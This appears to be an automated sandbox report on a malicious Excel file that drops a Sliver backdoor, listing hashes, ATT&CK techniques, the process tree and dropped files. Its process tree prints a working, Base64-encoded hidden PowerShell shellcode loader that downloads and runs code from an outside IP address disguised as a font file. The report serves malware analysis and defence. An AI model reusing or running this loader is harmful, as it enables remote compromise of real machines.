sliver | dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578

General

Target

dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578.xls
Size

46KB
MD5

a26cd351baea6159ea1979a56dad21db
SHA1

83ef2c3be02025d90d4d443cf3fe1fc84277fcb2
SHA256

dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578
SHA512

f42fe4fc3e7be31638c602ced0c9611a4f182f9f5bad82234d0df9872a58db5fd6980855237ca6078eabf90a6e2208f945d94442619a54fd7577d25c05700eb2
SSDEEP

768:D4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:ESFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor discovery execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	2952	2620	powershell.exe	29

Sliver RAT v2 1 IoCs

resource	yara_rule
behavioral1/memory/2952-45-0x0000000006770000-0x00000000071EE000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	2952	powershell.exe
6	2952	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2952	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dw20.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2620	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2952	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2952	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2620	EXCEL.EXE
2620	EXCEL.EXE
2620	EXCEL.EXE
2620	EXCEL.EXE
2620	EXCEL.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2620 wrote to memory of 2952	2620	EXCEL.EXE	30
PID 2620 wrote to memory of 2952	2620	EXCEL.EXE	30
PID 2620 wrote to memory of 2952	2620	EXCEL.EXE	30
PID 2620 wrote to memory of 2952	2620	EXCEL.EXE	30
PID 2952 wrote to memory of 2928	2952	powershell.exe	32
PID 2952 wrote to memory of 2928	2952	powershell.exe	32
PID 2952 wrote to memory of 2928	2952	powershell.exe	32
PID 2952 wrote to memory of 2928	2952	powershell.exe	32
PID 2928 wrote to memory of 2792	2928	csc.exe	33
PID 2928 wrote to memory of 2792	2928	csc.exe	33
PID 2928 wrote to memory of 2792	2928	csc.exe	33
PID 2928 wrote to memory of 2792	2928	csc.exe	33
PID 2952 wrote to memory of 1044	2952	powershell.exe	35
PID 2952 wrote to memory of 1044	2952	powershell.exe	35
PID 2952 wrote to memory of 1044	2952	powershell.exe	35
PID 2952 wrote to memory of 1044	2952	powershell.exe	35

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2620
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2952
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g7xy63dt.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2928
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC45.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCC44.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2792
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
    dw20.exe -x -s 824
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CabE301.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCC45.tmp

Filesize
1KB

MD5
2718fbc41bd4b9ba2c492c36ae29cdd7

SHA1
7afcb9109e85ea22300d0127df08b2b94b98cf4f

SHA256
5033ec0e95c464be140d024d09c435689be608b9ea177de2649292ff346a9963

SHA512
a77773572b71d059b70154ed0d803a14450988342a020087286ce851c5a0e6f1783476469fb894595c8adce64e273d8e0c3846bdd2f5dc06c6a61e919202d8cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\g7xy63dt.dll

Filesize
3KB

MD5
d2b609e9105a9762694dc1bb78e0251a

SHA1
727e6a3b3e528336b0a41cd8772a721ceb58826b

SHA256
6f0f1a4aed1675de5922a8a1d3e1dca64f73cf3af3ecc864d1d7c92972d0dc04

SHA512
48da9ddf4a163d84b6db47b4d0a030e662dd301b9e8c02609ff892977d60f1965594959e49c388c89864b015a617c3a0b037fd58eec56ee0be4135c7d7185c81

Download Submit
C:\Users\Admin\AppData\Local\Temp\g7xy63dt.pdb

Filesize
7KB

MD5
b82af3e1871c8e0c8eacaee752f41107

SHA1
a2a9a9df5d858386387069886e7ed4a8abf354bf

SHA256
7b26fe257d10bb5500f26e1d7b3cb8599c58f5e8289571d1410e73c6d85160b5

SHA512
78d117484aa2fb222069a8f4af7fa57ccd8fa265d268816f53b87a611ace0c3d4fb921baf348177b8f79ffe130235e55e09650147d19d887c6637f3e0c279bfe

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCCC44.tmp

Filesize
652B

MD5
3bdb4c0ff50ac8db2816ab3828972dbc

SHA1
445846e2b40ea735028682a2b73773a3bf3b87ee

SHA256
078938aa1ffa8791964a942dd3a11bda900c01538156d8bbac2dab100d265a50

SHA512
e6a7f9d098d43c06924050de7a00fc01f46c5465435d846f19d46f7ece4c391c3d511f235f696772c39a9a009b968b1d55606407c53b3c780ef5edeab9d11b6a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\g7xy63dt.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\g7xy63dt.cmdline

Filesize
309B

MD5
103aa305c0d49e651fd17237c7bd4140

SHA1
1db7c88478e3d2861723c5b702c86279e2c978fa

SHA256
614d95a155f2682004dc54bae92625e8a6110e48fc5c6d7a8643d4b718f31ddb

SHA512
d2fa70659af3aa8808b57784f76fa5f719609f79fdc5355a4aebdf3e58f258f34e191f465b18c13da325af130032e8ea120e85541d593aa07593fdbbb8d955fc

Download Submit
memory/2620-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2620-8-0x0000000006230000-0x0000000006330000-memory.dmp

Filesize
1024KB

Download
memory/2620-9-0x0000000006230000-0x0000000006330000-memory.dmp

Filesize
1024KB

Download
memory/2620-1-0x000000007260D000-0x0000000072618000-memory.dmp

Filesize
44KB

Download
memory/2620-43-0x000000007260D000-0x0000000072618000-memory.dmp

Filesize
44KB

Download
memory/2620-44-0x0000000006230000-0x0000000006330000-memory.dmp

Filesize
1024KB

Download
memory/2952-45-0x0000000006770000-0x00000000071EE000-memory.dmp

Filesize
10.5MB

Download

Analysis

Sharing